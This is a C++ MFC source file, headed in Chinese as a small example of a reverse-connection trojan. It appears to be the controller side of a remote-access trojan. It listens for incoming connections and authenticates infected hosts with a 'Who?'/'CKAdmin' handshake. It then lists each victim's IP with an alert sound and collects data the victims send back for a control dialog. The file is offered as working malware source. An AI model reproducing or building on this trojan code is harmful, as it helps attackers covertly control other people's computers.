stdafx.cpp

一个用vc写的反弹式木马的小例子

// stdafx.cpp : source file that includes just the standard includes
//	MC.pch will be the pre-compiled header
//	stdafx.obj will contain the pre-compiled type information

#include "stdafx.h"
#include "winsock2.h"
#include  <mmsystem.h>
#pragma comment(lib, "WINMM.LIB")
#include "MFC.h"

extern	ListCK	*ListHead;
extern	BOOL	bStart;
extern	USHORT	TallID;
extern  ActiveList* HeadActiveList;
extern  DWORD	CurLocalIP;

void  AddToCKList ( ListCK* lp );
void AddStrToListCtrl(CListCtrl* lpList,CString str);

DWORD WINAPI AcceptFunc ( LPVOID lpParameter )
{
	// INIT
	ListCK* lp = (ListCK*) lpParameter;
	DWORD LocalIP = lp->dwIP;
	USHORT LocalPort = lp->uPort;
	CListCtrl* lpList = (CListCtrl*)lp->Next;
	/////////////////////

	SOCKET	sock = NULL;
	sock = socket(AF_INET, SOCK_STREAM , IPPROTO_TCP);
	if ( sock == INVALID_SOCKET )
	{
		AfxMessageBox("socket init error");
		return -1;
	}
	SOCKADDR_IN addr_in = {0};
	addr_in.sin_addr.S_un.S_addr = LocalIP;
	addr_in.sin_family = AF_INET;
	addr_in.sin_port = htons(LocalPort);

	Sleep(100);
	int ret = 0;
	ret = bind (sock, (struct sockaddr*)&addr_in,sizeof(addr_in) );
	if ( ret == SOCKET_ERROR )
	{
		AfxMessageBox("bind error");
		return -1;
	}
	listen(sock,1);
	ULONG L=0;
	ret = ioctlsocket(sock,FIONBIO,&L);

	while ( TRUE )
	{
		if ( bStart == TRUE )
		{

			fd_set  fdR;
			struct  timeval timeout;
			timeout.tv_sec = 2;
			timeout.tv_usec = 0;
			FD_ZERO(&fdR);  
			FD_SET(sock, &fdR);
			
			switch (select(sock + 1, &fdR, NULL,NULL, &timeout))
			{  
                case SOCKET_ERROR:  
					TRACE("00000000000\n");
					break;
                        
                case 0:  
				//	TRACE("11111111111\n");
					break;
                        
                default:  
                        if ( FD_ISSET(sock,&fdR) )
						{  
						//	TRACE("333333333\n");
							SOCKADDR_IN A = {0};
							int len = sizeof(A);

							SOCKET  s = accept(sock,(struct sockaddr *)&A,&len);
							if ( s != INVALID_SOCKET )
							{
								char buf[64] = {0};
								int oldopt = 0;
								int ret;
								int len = sizeof(int);
								ret = getsockopt (s,SOL_SOCKET, SO_RCVTIMEO,(char*)&oldopt,&len);
								int newopt = 3000;
								ret = setsockopt (s,SOL_SOCKET, SO_RCVTIMEO,(char*)&newopt,len);

								recv(s,buf,64,0);
								if (!strcmp(buf,"Who?"))
								{
									send(s,"CKAdmin",7,0);
								
									char *p = inet_ntoa(A.sin_addr);
									//AfxMessageBox(p);
									//Add to CKList
									ListCK *tp =(ListCK *)calloc(1,sizeof(ListCK));
									TRACE("######%08x\n",tp);
									tp->dwIP = A.sin_addr.S_un.S_addr;
									tp->sock = s;
									tp->Next = NULL;
									tp->uID = TallID;
									AddToCKList(tp);
									//add to m_List
									AddStrToListCtrl(lpList,p);												
									TallID++;
									PlaySound(MAKEINTRESOURCE(IDR_WAVE),AfxGetResourceHandle(),SND_RESOURCE|SND_PURGE|SND_NODEFAULT); 
								}
								ret = setsockopt (s,SOL_SOCKET, SO_RCVTIMEO,(char*)&oldopt,len);
							}
						}
			}
			FD_CLR(sock, &fdR);
		}
		else
		{
			TRACE("333333333\n");
			closesocket(sock);
			return 1;
		}
	}

	return 1;
}


void RemoveCKList()
{
	while ( ListHead != NULL )
	{
		ListCK *tp = ListHead;

		ListHead = ListHead->Next;
		free(tp);
	}
}
		
void  AddToCKList ( ListCK* lp )
{
	if ( ListHead == NULL )
		ListHead = lp;
	else
	{
		ListCK* temp = ListHead;
		ListHead = lp;
		lp->Next = temp;
	}

}

void AddStrToListCtrl(CListCtrl* lpList,CString str)
{
	int tail = lpList->GetItemCount();
	lpList->InsertItem(tail,"");
	CString num;
	num.Format("%d",TallID);
	lpList->SetItemText(tail,0,num);
	lpList->SetItemText(tail,1,str);
}


void	AddToActiveList(CString sid, CWnd* lpDlg)
{
	int id = atoi(sid);

	ActiveList *lp =(ActiveList *)calloc(1,sizeof(ActiveList));
	lp->ID = id;
	lp->lpDlg = lpDlg;
	lp->Next = NULL;

	if ( HeadActiveList== NULL )
		HeadActiveList = lp;
	else
	{
		ActiveList* temp = HeadActiveList;
		HeadActiveList = lp;
		lp->Next = temp;
	}
}

BOOL	FindActiveWindow(CString sid)
{
	int id = atoi(sid);
	ActiveList* Tp = HeadActiveList;

	while ( Tp != NULL )
	{
		if ( id == Tp->ID )
		{
			Tp->lpDlg->SetFocus();
			Tp->lpDlg->ShowWindow(SW_SHOWNOACTIVATE);
			return	TRUE;
		}
		Tp=Tp->Next;
	}
	return	FALSE;
}

BOOL	DelFromActiveWindow(CString sid)
{
	int id = atoi(sid);
	ActiveList* Tp = HeadActiveList;
	ActiveList* orgTp = HeadActiveList;
	while ( Tp != NULL )
	{
		if ( Tp->ID != id )
		{
			orgTp = Tp;
			Tp = Tp->Next;
		}
		else	break;
	}
	if ( Tp == NULL )
		return FALSE;
	//del from head
	if ( Tp == HeadActiveList )
	{
		ActiveList* t = Tp;
		HeadActiveList = Tp->Next;
		free(t);
	}
	else  //del
	{
		ActiveList* t = Tp;
		orgTp->Next = Tp->Next;
		free(t);
	}
	
	return	TRUE;
}

DWORD WINAPI RecvThread ( LPVOID lpParameter )
{
	RecvThreadInfor* T =(RecvThreadInfor*) lpParameter;
	RecvThreadInfor	L = {0};
	L.pButton = T->pButton;
	L.pmemHandle = T->pmemHandle;
	L.pOut = T->pOut;
	L.sock = T->sock;
	L.pNum = T->pNum;

	while ( TRUE )
	{
		char Buf [ 1024 ] = {0};
		int ret = recv( *L.sock , Buf, 1024 , 0 );
		
		if ( ret == -1 )
		{
			TRACE("\n OnClose() " );
			AfxMessageBox("无法和对方通信请关闭此控制对话框");
			return 0;
		}
		
		DWORD	OldSize = *L.pNum;
		*L.pNum = OldSize + ret;
		
		GLOBALHANDLE Th  = GlobalAlloc(GMEM_MOVEABLE | GMEM_ZEROINIT | GMEM_SHARE,*L.pNum+1);
		char*	p = (char*)GlobalLock(*L.pmemHandle);
		char*	tp = (char*)GlobalLock(Th);
		memcpy(tp,p,OldSize);
		memcpy(tp+OldSize,Buf,ret);
		tp[OldSize+ret] = 0;
	
		GlobalUnlock(*L.pmemHandle);
		GlobalUnlock(Th);

		GlobalFree(*L.pmemHandle);
		*L.pmemHandle = Th;
		L.pOut->SetHandle(*L.pmemHandle);
		Sleep(10);
	
	}
	return	1;
}